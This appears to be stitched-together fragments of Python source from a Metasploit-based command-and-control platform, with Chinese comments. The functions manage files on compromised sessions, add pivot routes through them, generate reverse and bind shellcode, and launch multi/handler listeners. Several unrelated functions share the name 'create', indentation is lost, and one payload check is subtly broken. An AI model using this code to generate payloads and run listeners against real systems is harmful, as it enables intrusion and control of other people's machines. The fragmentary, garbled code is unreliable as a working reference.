def create(sessionid=None, filename=None, dirpath=None, operation=None):
if operation == 'create_dir' and sessionid is not None and dirpath is not None: # 新建文件夹
formatdir = FileSession.deal_path(dirpath)
opts = {'OPERATION': 'create_dir', 'SESSION': sessionid, 'SESSION_DIR': formatdir}
result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=False, timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), [])
return context
try:
result = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if result.get('status') is not True:
context = data_return(303, FileSession_MSG.get(303), [])
return context
else:
context = data_return(201, FileSession_MSG.get(201), result.get('data'))
return context
# 上传文件
elif operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None:
formatdir = FileSession.deal_path(dirpath)
opts = {'OPERATION': 'upload', 'SESSION': sessionid, 'SESSION_DIR': formatdir, 'MSF_FILE': filename}
result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=True, timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
context = data_return(201, FileSession_MSG.get(201), result)
return context
else:
context = data_return(306, FileSession_MSG.get(306), [])
return context
def destory(subnet=None, netmask=None, sessionid=None):
opts = {
'CMD': 'delete',
'SUBNET': subnet,
'NETMASK': netmask,
'SESSION': sessionid
}
result = MSFModule.run(module_type="post",
mname="multi/manage/routeapi",
opts=opts)
if result is None:
context = data_return(505, CODE_MSG.get(505), [])
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(306, Route_MSG.get(306), {})
return context
if result_dict.get('status') is True:
Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}")
context = data_return(204, Route_MSG.get(204), {})
return context
else:
context = data_return(304, Route_MSG.get(304), {})
return context
def generate_shellcode(mname=None, opts=None):
"""根据配置生成shellcode"""
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(
f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(
f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
opts["Format"] = 'raw'
if "windows" in mname:
opts["Format"] = 'raw'
elif "linux" in mname:
opts["Format"] = 'raw'
elif "java" in mname:
opts["Format"] = 'jar'
elif "python" in mname:
opts["Format"] = 'py'
elif "php" in mname:
opts["Format"] = 'raw'
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
return result
byteresult = base64.b64decode(result.get('payload'))
return byteresult
def _get_info(self, info_part):
if self.sessionid is None:
return None
module_type = "post"
mname = "multi/gather/base_info"
opts = {'SESSION': self.sessionid, 'INFO_PART': info_part}
if self.sessionid is None or self.sessionid <= 0:
return None
result = MSFModule.run(module_type=module_type, mname=mname, opts=opts)
if result is None:
return None
try:
result_dict = json.loads(result)
if result_dict.get('status'):
return result_dict.get('data')
else:
return None
except Exception as E:
logger.warning(E)
return None
def create(subnet=None, netmask=None, sessionid=None, autoroute=None):
if autoroute is True:
# 调用autoroute
opts = {'CMD': 'autoadd', 'SESSION': sessionid}
else:
opts = {
'CMD': 'add',
'SUBNET': subnet,
'NETMASK': netmask,
'SESSION': sessionid
}
result = MSFModule.run(module_type="post",
mname="multi/manage/routeapi",
opts=opts)
if result is None:
context = data_return(505, CODE_MSG.get(505), [])
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(306, Route_MSG.get(306), [])
return context
if result_dict.get('status') is True:
if isinstance(result_dict.get('data'), list):
if autoroute:
Notice.send_success(f"新增路由,SID:{sessionid} 自动模式")
else:
Notice.send_success(
f"新增路由,SID:{sessionid} {subnet}/{netmask}")
context = data_return(201, Route_MSG.get(201),
result_dict.get('data'))
else:
context = data_return(305, Route_MSG.get(305), [])
return context
else:
context = data_return(305, Route_MSG.get(305), [])
return context
def create(opts=None):
# 所有的参数必须大写
# opts = {'PAYLOAD': payload, 'LHOST': LHOST, 'LPORT': LPORT, 'RHOST': RHOST}
if opts.get('VIRTUALHANDLER') is True: # 虚拟监听
opts.pop('VIRTUALHANDLER')
result = Handler.create_virtual_handler(opts)
if result is None:
opts['ID'] = None
context = data_return(301, Handler_MSG.get(301), opts)
else:
context = data_return(201, Handler_MSG.get(201), {})
else:
# 真正的监听
# 处理代理相关参数
if opts.get("proxies_proto") == "Direct" or opts.get("proxies_proto") is None:
try:
opts.pop('proxies_proto')
except Exception as _:
pass
try:
opts.pop('proxies_ipport')
except Exception as _:
pass
else:
proxies_proto = opts.get('proxies_proto')
proxies_ipport = opts.get('proxies_ipport')
opts["proxies"] = f"{proxies_proto}:{proxies_ipport}"
try:
opts.pop('proxies_proto')
except Exception as _:
pass
try:
opts.pop('proxies_ipport')
except Exception as _:
pass
try:
if opts.get('PAYLOAD').find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
# 查看端口是否已占用
# lport = int(opts.get('LPORT'))
# flag, lportsstr = is_empty_ports(lport)
# if flag is not True:
# context = dict_data_return(306, Handler_MSG.get(306), {})
# return context
elif opts.get('PAYLOAD').find("bind") > 0:
if opts.get('LHOST') is not None:
opts.pop('LHOST')
# 反向http(s)服务常驻问题特殊处理
if opts.get('PAYLOAD').find("reverse_http") or opts.get('PAYLOAD').find("reverse_winhttp"):
opts['EXITONSESSION'] = False
opts['KillHandlerFouce'] = True
else:
if opts.get('EXITONSESSION'):
opts['EXITONSESSION'] = True
else:
opts['EXITONSESSION'] = False
opts['PayloadUUIDSeed'] = str(uuid.uuid1())
except Exception as E:
logger.error(E)
context = data_return(500, CODE_MSG.get(500), {})
return context
result = MSFModule.run(module_type="exploit", mname="multi/handler", opts=opts, runasjob=True)
if isinstance(result, dict) is not True or result.get('job_id') is None:
opts['ID'] = None
context = data_return(301, Handler_MSG.get(301), opts)
else:
job_id = int(result.get('job_id'))
if Job.is_msf_job_alive(job_id):
opts['ID'] = int(result.get('job_id'))
Notice.send_success("新建监听成功:{} {} JobID:{}".format(opts.get('PAYLOAD'), opts.get('LPORT'),
result.get('job_id')))
context = data_return(201, Handler_MSG.get(201), opts)
else:
context = data_return(301, Handler_MSG.get(301), opts)
return context
